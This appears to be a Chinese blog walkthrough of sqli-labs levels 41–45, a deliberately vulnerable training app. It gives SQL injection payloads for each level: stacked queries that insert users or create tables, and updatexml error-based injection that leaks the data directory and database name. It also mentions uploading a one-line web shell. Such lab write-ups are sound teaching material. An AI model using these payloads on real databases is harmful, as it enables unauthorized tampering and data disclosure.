当前位置
请选择城市
  • 热门
  • ABCDEFG
  • HIJKL
  • MNOPQRST
  • WXYZ
打造高能级科技创新平台
免费发布任务
免费发布任务
首页 > 藏经阁
Less41-45
网络安全  /  2024-12-19  /  7746浏览

Less41

代码分析此关和39关代码很相似,但是没有错误显示,因此不能报错注入
在这里插入图片描述

payload

1;insert into users(id,username,password)values(20,'sqli-41','41')--+

在这里插入图片描述
参考第七关的导入导出,此处也可以尝试上传一句话

Less42

代码分析
先查看pass_change.php文件
在这里插入图片描述
查看login.php
在这里插入图片描述
payload

admin';create table sqli42 like users#创建一个表

在这里插入图片描述
尝试报错注入payload

1'or updatexml(1,concat('~',@@datadir),0)#

在这里插入图片描述

Less43

代码分析
43关代码和42只在sql语句的闭合方式不同
在这里插入图片描述
报错注入示例

1')or updatexml(1,concat('~',database()),0)#

在这里插入图片描述

Less44

代码分析
在这里插入图片描述
插入数据payload

1';insert into users(id,username,password)values(44,'sqli-44','44')#

在这里插入图片描述

Less45

代码分析
在这里插入图片描述payload

admin');create table sqli45 like users#

在这里插入图片描述


点赞 0
收藏 0
我要打赏
热点文章
什么是网络安全等级保护
什么是网络安全等级保护
19520阅读
5评论
python编写sqli-labs11关
python编写sqli-labs11关
14774阅读
0评论
SQLI-Less-11-15
SQLI-Less-11-15
14745阅读
0评论
sqli-labs16-20
sqli-labs16-20
14615阅读
0评论
sqli-labs26-32
sqli-labs26-32
14410阅读
0评论
评论0
2000
发布评论
首页 需求大厅 大牛在凤雏 创业基地 云员工 藏经阁 软考试题 CTF挑战赛 白帽服务 入驻院校 企业服务
咨询热线:
09962028123
联系地址
新疆巴州库尔勒市豪景大厦
E-mail
fengchuyunwei@163.com
友情链接:
新疆科技学院官网 山石网科官网 安恒信息官网 网御星云官网 绿盟科技官网 深信服官网 奇安信官网 启明星辰官网 天融信官网 威努特官网 亚信安全官网 360数字安全官网

© 2023-2024 凤雏运维 版权所有,并保留所有权利   新ICP备2021001141号-2

首页
专属客服
发布任务
意见反馈
需求大厅
我的